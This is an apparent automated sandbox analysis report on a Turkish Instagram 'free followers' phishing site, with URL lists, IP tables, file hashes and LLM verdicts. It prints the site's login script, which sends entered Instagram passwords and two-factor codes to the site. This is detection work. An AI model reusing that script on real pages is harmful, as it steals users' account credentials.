                    • Avira URL Cloud: safe
                    unknown
                    https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_183.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://sachinchoolur.github.io/lightGallery/chromecache_162.2.dr, chromecache_174.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://recaptcha.netchromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://tagassistant.google.com/chromecache_201.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.apache.org/licenses/chromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://translate.google.comchromecache_164.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://adservice.google.com/pagead/regclkchromecache_188.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://cct.google/taggy/agent.jschromecache_188.2.drfalse
                    • URL Reputation: safe
                    unknown
                    http://fontawesome.io/licensechromecache_186.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.gstatic.c..?/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__.chromecache_183.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://play.google.com/log?format=json&hasfast=truechromecache_183.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_183.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/ads/ga-audienceschromecache_201.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.%/ads/ga-audienceschromecache_201.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://td.doubleclick.netchromecache_188.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.merchant-center-analytics.googchromecache_188.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_206.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/maps/embed/v1/view?key=AIzaSyAT2XRwYXUTETmiIkYvrCg6_CwxtcdpMhI&center=chromecache_209.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.27.83
                    anatakip.comUnited States
                    13335CLOUDFLARENETUStrue
                    142.250.185.142
                    www3.l.google.comUnited States
                    15169GOOGLEUSfalse
                    35.190.80.1
                    a.nel.cloudflare.comUnited States
                    15169GOOGLEUSfalse
                    104.21.84.90
                    instahilecin.comUnited States
                    13335CLOUDFLARENETUSfalse
                    104.22.74.171
                    widgets.amung.usUnited States
                    13335CLOUDFLARENETUSfalse
                    104.22.75.171
                    whos.amung.usUnited States
                    13335CLOUDFLARENETUSfalse
                    172.67.141.216
                    unknownUnited States
                    13335CLOUDFLARENETUSfalse
                    239.255.255.250
                    unknownReserved
                    unknownunknownfalse
                    104.21.72.53
                    instahilecin.netUnited States
                    13335CLOUDFLARENETUSfalse
                    142.250.186.100
                    unknownUnited States
                    15169GOOGLEUSfalse
                    172.217.16.196
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    IP
                    192.168.2.6
                    192.168.2.5
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1447764
                    Start date and time:2024-05-27 00:56:37 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 3m 39s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:browseurl.jbs
                    Sample URL:https://instahilecin.net/
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal88.phis.win@32/119@22/13
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Browse: https://anatakip.com/login
                    • Browse: https://anatakip.com/tools
                    • Browse: https://anatakip.com/packages
                    • Browse: https://anatakip.com/blog
                    • Browse: https://anatakip.com/#TakipciHilesi
                    • Browse: https://anatakip.com/#modalContact
                    • Browse: https://anatakip.com/login
                    • Browse: https://anatakip.com/tools
                    • Browse: https://anatakip.com/packages
                    • Browse: https://anatakip.com/blog
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 142.250.184.195, 74.125.71.84, 142.250.184.206, 34.104.35.123, 142.250.185.170, 142.250.186.35, 142.250.186.136, 216.58.206.46, 40.68.123.157, 199.232.214.172, 192.229.221.95, 172.217.16.195, 216.58.206.42, 142.250.186.42, 142.250.185.74, 142.250.185.202, 142.250.185.106, 142.250.181.234, 142.250.185.234, 172.217.16.138, 216.58.206.74, 142.250.184.202, 142.250.186.74, 172.217.18.10, 216.58.212.170, 142.250.184.234, 142.250.185.138, 142.250.186.106, 20.242.39.171, 216.58.212.138, 142.250.74.202, 142.250.184.227, 142.250.181.227, 52.165.164.15, 142.250.184.200, 216.58.206.67, 172.217.18.99, 142.250.185.110, 93.184.221.240
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, translate-pa.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, update.googleapis.com, hlb.apr-52dd2-0.edgecastdns.net, www.gstatic.com, wu-b-net.trafficmanager.net, www.google-analytics.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, translate.googleapis.com, clients.l.google.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    No simulations
                    InputOutput
                    URL: https://anatakip.com/ Model: Perplexity: mixtral-8x7b-instruct
                    {
                    "loginform": true,
                    "reasons": [
                    "The text contains a 'GIRIS YAP' button which is Turkish for 'LOGIN'.",
                    "The text mentions 'instagram' several times, which is a popular social media platform often associated with login forms.",
                    "The text mentions 'takipqi' which is Turkish for 'followers', suggesting a possible connection to a login form."
                    ]
                    }
                    GiRi$ TOOLS PACKAGES BLOG instagram Takipqi H' eS Dnyamn en hull sos listirme platformu @ GIRIS YAP TAKIPQI KAZAN + INSTAGRAM TAKIPQI VE BEGENI PAKETLERIMIZ + Instagram TakipGi Hilesi : internet fenomeni olmak iGin sosyal medya platformlarru Gok iyi kullanmak gerekiyor.Yayg1n olarak kullamlan sosyal medya platformalarnda biri olan Instagram'da Gok genis kitlelere sayislnl arttlrmak birqok kisinin hayalidir.Sistemizde herkese cretsiz olarak aqlk olan takipqi hilesini kullanarak takipqi sayinzl arttlrabilirsiniz.Siz de hayallerinizi gerqekleqtirmek istiyorsamz cretsiz takipGi hilesini denemeyi unutmayn. + Instagram Begeni Hilesi : Tm sosyal medya platformlarnda beeni sayislnn ykseklii oldukqa nemli bir etkendir.TakipGi saymz ne kadar yksek olursa aym oranla gnderilerinizde beeni olmasl gerekir.Beeni sayilarlnlzl arttlrmamz artlk Gok kolay sitemizde bulunan beeni hilesi ile cretsiz bir *kilde gnderilerinizin beene sayislnl arttlrabilir ve fenomen olma yolunda byk adlmlar atmaya devam edebilrisiniz. + Instagram TakipGi Hilesi instagram da herkes fenomen olmak ister bunun en basit yolu ke#fet dqmektir.Kesfete d*meninde en kolay yolu gnderilerinizin altindaki yorumlard1r.Gnderilerinizin altinda ne kadar Gok yorum varsa ke*fete Gikma oranmz insanlarn sizi tamma oranl o kadar artar.Sitemizde bulunan cretsiz yorum hilesini kullanarak gnderilerinize yorum atarabilirsiniz. Sende fenomen olmak istiyorsan bu firsatl kaGlrma. 
                    URL: https://anatakip.com/ Model: Perplexity: mixtral-8x7b-instruct
                    {
                    "loginform": false,
                    "reasons": [
                    "No input fields for username or password are present in the text.",
                    "No submit button for the login form is present in the text.",
                    "The text is about Instagram follower tools and packages, not a login form."
                    ]
                    }
                    Cnstagram O GiRi$ TOOLS PACKAGES BLOG instagram Takipqi Hi eS Dnyarmn en hlzll sosya Qtirme platformu @ GiRis YAP TAKiPGi KAZAN + iNSTAGRAM TAKiPGi VE BEGENi PAKETLERiMiZ + instagram Takipgi Hilesi : internet fenomeni olmak iqin sosyal medya platformlanm $0k iyi kullanmak gerekiyor. Yaygn olarak kullamlan medya platformalannda biri olan Instagram'da pk genif kitlelere ula9mak,takipqi arttlrmak birqok kifinin hayalidir.Sistemizde herkese cretsiz olarak aqlk olan takipqi hilesini kullanarak takipqi sayimzl artrabilirsiniz.Siz de hayallerinizi gerqekle$irmek istiyorsamz cretsiz takipqi hilesini denemeyi unutmayn. + Instagram Hilesi : Tm sosyal medya platformlannda beeni ykseklii oldukqa nemli bir etkendir. Takipqi sayimz ne kadar yksek olursa aym oranla gnderilerinizde beeni olmasl gerekir.Beeni sayllanmzl arttlrmamz artlk 90k kolay sitemizde bulunan beeni hilesi ile cretsiz bir *kilde gnderilerinizin begene sayislnl artrabilir ve fenomen olma yolunda byk admlar atmaya devam edebilrisiniz. + Instagram Takipqi Hilesi : instagram da herkes fenomen olmak ister bunun en basit yolu ke9fet dimeninde en kolay yolu gnderilerinizin altindaki yorumlard1r.Gnderilerinizin altinda ne kadar $0k yorum varsa ke$ete Gikma orammz insanlarln sizi tamma oram o kadar artar.Sitemizde bulunan cretsiz yorum hilesini kullanarak gnderilerinize yorum attirabilirsiniz.Sende fenomen olmak istiyorsan bu firsatl kaqrma. 
                    URL: https://anatakip.com/ Model: gpt-4o
                    ```json
                    {
                      "riskscore": 0,
                      "reasons": "The provided JavaScript code primarily includes Google Analytics tracking and a call to an external image for tracking purposes. There are no indications of malicious behavior such as data exfiltration, credential stealing, or unauthorized access attempts."
                    }
                    (function (i, s, o, g, r, a, m) {
                    				i['GoogleAnalyticsObject'] = r;
                    				i[r] = i[r] || function () {
                    					(i[r].q = i[r].q || []).push(arguments)
                    				}, i[r].l = 1 * new Date();
                    				a = s.createElement(o),
                    					m = s.getElementsByTagName(o)[0];
                    				a.async = 1;
                    				a.src = g;
                    				m.parentNode.insertBefore(a, m)
                    			})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
                    			ga('create', '', 'auto');
                    			ga('send', 'pageview');
                    									new Image().src = 'https://whos.amung.us/widget/anatakipx.png';
                    						initProject();
                    URL: https://anatakip.com/login Model: gpt-4o
                    ```json
                    {
                      "riskscore": 8,
                      "reasons": "The JavaScript code captures sensitive information such as username, password, and user ID, and sends it via an AJAX POST request to an unspecified URL ('?'). This behavior is typical of phishing attempts where credentials are harvested. Additionally, the code includes functionality for handling two-factor authentication codes, which further suggests it is designed to capture comprehensive user authentication details."
                    }
                    $('#login_insta').click(function () {
                    				$('#slfErrorAlert').hide();
                    				$(this).attr("disabled", "disabled");
                    				$maindiv = $(this);
                    				$maindiv.addClass("instaclass31");
                    				$('.spispinner').show();
                    								var dataList = "username=" + encodeURIComponent($('input[name="username"]').val()) + "&password=" + encodeURIComponent($('input[name="password"]').val()) + "&userid=" + encodeURIComponent($('input[name="userid"]').val()) + "&antiForgeryToken=c9ce46adb78c4ef537c1fc108df66e19";
                    				
                    				$.ajax({
                    					type: "POST",
                    					url: "?",
                    					dataType: "json",
                    					data: dataList,
                    					success: function (json) {
                    						if (json.status == 'success') {
                    							window.parent.location.href = json.returnUrl;
                    							window.parent.$.fancybox.close();
                    						} else {
                    
                    							var $allData = json.allData;
                    							if (json.status == 1) {
                    								window.parent.location.href = json.returnUrl;
                    								window.parent.$.fancybox.close();
                    							}
                    							if (json.status == 3) {
                    
                    								if (json.allData.step_name == 'verify_code') {
                    
                    									var onayKoduEkrani = $('.onay_kodu_girme_ekrani');
                    									onayKoduEkrani.html('');
                    									var html = "<div>Ltfen size gnderilen 6 haneli kodu girerek devam edin.</div><br/>";
                    									html += "<input type='number' id='kod_onayla_input' value='' maxlength='6' placeholder='Onay Kodu?'/>";
                    									html += "<div><button class='kod_onayla'>Onayla</button>";
                    									onayKoduEkrani.html(html);
                    									onayKoduEkrani.show();
                    
                    									$('.kod_onayla').click(function () {
                    										var kodOnay = $('#kod_onayla_input').val();
                    
                    										if (kodOnay.length < 6) {
                    											alert("Gelen onay kodu en az 6 karakter olmaldr");
                    										}
                    
                    										$allData.code = kodOnay;
                    										$('.kod_onayla').attr("disabled", "disabled");
                    										$('.kod_onayla').html('Onaylanyor..');
                    										$.ajax({
                    											url: "/ajax/kod-onayla",
                    											data: $allData,
                    											type: "POST",
                    											success: function (json) {
                    												if (json.status == "ok") {
                    													window.parent.location.href = json.returnUrl;
                    													window.parent.$.fancybox.close();
                    												} else {
                    													alert(json.error);
                    													$('.spispinner').hide();
                    													$maindiv.removeAttr("disabled");
                    													$maindiv.removeClass("instaclass31");
                    												}
                    											}
                    										});
                    									});
                    
                    								} else {
                    									var onayEkrani = $('.onay_kodu_ekrani');
                    									onayEkrani.html('');
                    									var data = json.allData.step_data;
                    
                    
                    									var html = "<div>" + json.error + "</div><br/>";
                    									html += "<select id='choice_select'>";
                    
                    									if (typeof data.phone_number !== "undefined") {
                    										html += "<option value='0'>GSM ile Onayla: " + data.phone_number + "</option>";
                    									}
                    
                    									if (typeof data.email !== "undefined") {
                    										html += "<option value='1'>E-Posta ile Onayla: " + data.email + "</option>";
                    									}
                    
                    									html += "</select>";
                    									html += "<div><button class='kod_iste'>Gvenlik K
                    URL: https://anatakip.com/ Model: gpt-4o
                    ```json
                    {
                      "phishing_score": 8,
                      "brands": "Instagram",
                      "phishing": true,
                      "suspicious_domain": true,
                      "has_loginform": true,
                      "has_captcha": false,
                      "setechniques": true,
                      "reasons": "The URL 'anatakip.com' does not match the legitimate domain name associated with Instagram, which is 'instagram.com'. The site uses social engineering techniques by offering free followers and likes, which is a common tactic in phishing attacks. Additionally, the presence of a login form on a suspicious domain increases the risk of phishing."
                    }
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:57:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):3.9817918969841357
                    Encrypted:false
                    SSDEEP:48:8OwdLTTTNHiidAKZdA19ehwiZUklqehBy+3:85rGey
                    MD5:E2BDE53F72D39489283A2F4E1B3B43DE
                    SHA1:6FA788A75B984088A5A76C2643BBDD520C01AB66
                    SHA-256:0CA663F97C13E2D8E296F84ECE0E9056E0B10CDF47DD758B81CA369EDBC9A45C
                    SHA-512:F60F5FF3B89B576E6B730F6CBDED769EBFE977FC408F1AEDBEDD5D8F71A09E243DE272A732D4B3874579776D9F0668C57C2C081EFC8472B9E4EA7A4AE44EBCF1
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,.....}b.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X+.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X+.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X+.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X+............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X/............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............B.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:57:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2679
                    Entropy (8bit):3.9969713993495812
                    Encrypted:false
                    SSDEEP:48:8ndLTTTNHiidAKZdA1weh/iZUkAQkqehOy+2:85rE9Qny
                    MD5:E1F7D5E583734B6EEA49074C5A67C622
                    SHA1:146203D253A8C12D2E80763E99F619085AA4FFEF
                    SHA-256:58D3F675E59A8DFF39BC9126A46CB8999483A6E8BD4C1F183C605A2D21B9B810
                    SHA-512:3BA681F6CF166F10E6838230D73EE922ADAD4D78E71AC80E71EC695FC87ED4CDA48004FB4366E93F0770BFF35A0476B1EB6A53AB35456DC742C906FB7D96CD47
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,......W.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X+.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X+.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X+.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X+............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X/............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............B.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2693
                    Entropy (8bit):4.00758512042965
                    Encrypted:false
                    SSDEEP:48:8xsdLTTTsHiidAKZdA14tseh7sFiZUkmgqeh7scy+BX:8x8rfnay
                    MD5:60EC6423DF39DBB70399F9B69E1D5E23
                    SHA1:8A12FF69FAFA19DE324088170073E8C420C66661
                    SHA-256:87364BFC1F167406DE33C1FD8DD1343584DCA6EED31CD66E7BF7FCDAC54ABC04
                    SHA-512:659F201C0C0A8B095DEA760B6CE025DE4F4DFA6CDC0D20B5194D77CCCF4CCAB07A65B5D7FFBB014095F53114F5484E567568F4C91141E7E2787EFA477A6DE60B
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X+.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X+.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X+.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X+............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............B.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:57:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2681
                    Entropy (8bit):3.9956698851568855
                    Encrypted:false
                    SSDEEP:48:8mdLTTTNHiidAKZdA1vehDiZUkwqehCy+R:8CrPEy
                    MD5:88B299E02E0A29E94ED325D5B12EF5DA
                    SHA1:ABB3DFCC3C31BBE811BD5134EB9D9AA850DF1FD3
                    SHA-256:F7E6EA818FEA74600E4E0DF730C349E3D57E8CCBF62B1EEE5BF6A5439B904EE4
                    SHA-512:DAB4562AC4F1E812B60DEBBF580C33354B266F447CFB02F5374C2E2CBE90E6D4D9C15069A23005833A9BCBCA2346D2C144FDFD93AF174557D6254134B5DC6E0D
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,......P.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X+.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X+.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X+.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X+............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X/............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............B.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:57:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2681
                    Entropy (8bit):3.984254846138611
                    Encrypted:false
                    SSDEEP:48:8QdLTTTNHiidAKZdA1hehBiZUk1W1qehoy+C:8orv9Iy
                    MD5:56E93D9A99CB678CE2759C7F1DAE1E01
                    SHA1:8254B7FF266632CAEDBD849078392FA6E8291F60
                    SHA-256:0C0042907CE39644AEAA5BCEA8E0B394CB813D6EE6815907F0A85536D51D1CF2
                    SHA-512:6383A21765BC650EAC463D069B476EA880F3B8CC2D3F0D63FFD12A855907C4D830FFD4B98ADD3DAA22668DF66810CA56EDCB95CE1ADD8D5607B255BF6CDD5D10
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,......\.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X+.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X+.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X+.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X+............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X/............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............B.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun May 26 21:57:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2683
                    Entropy (8bit):3.9981075195927387
                    Encrypted:false
                    SSDEEP:48:8rdLTTTNHiidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbay+yT+:8FrnT/TbxWOvTbay7T
                    MD5:DE0D6C53429A6C2B2EA996C693A8B1C0
                    SHA1:36DBFA2C15E31C9EBA6A62B55F259D3C031E03C9
                    SHA-256:C9B225D3B03C3C5E6EF0500EE2AF23CAB8CE463CFBEB62E59BC54393D971AAAA
                    SHA-512:87849C752A5D68BB119C2B76131EC92E9D5585ACD11E8411F5D52B60D8998BA982F6A7EAC11F26F24EABC6CF1960D8394DBC7633F574DC84E1A5A44CCA6FCB5D
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,......E.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X+.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X+.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X+.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X+............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X/............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............B.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                    Category:downloaded
                    Size (bytes):1842
                    Entropy (8bit):7.844880044441599
                    Encrypted:false
                    SSDEEP:48:CpBmStVyR9tjRq82OyNFQVYhMyTkRJO05Z:OuRP9q82OyNFQVY3CJOaZ
                    MD5:C69C796362406F9E11C7F4BF5BB628DA
                    SHA1:E489CE95AB56208090868882113D7416ABF46775
                    SHA-256:4DAC0026FBFA2615DCE30C0AF12830863FE885F84387A0147B9E338F548D5D82
                    SHA-512:D3AD560ED0FD29BE7D2CC434694F09E5A6FBEA8B29C0611AECB54A1B73B4D722C53F42A19DAE9E3D5D358444E50FB8FFFBC39D67CE751BDBC8C861F6F95D3162
                    Malicious:false
                    Reputation:low
                    URL:https://www.gstatic.com/images/branding/product/2x/translate_24dp.png
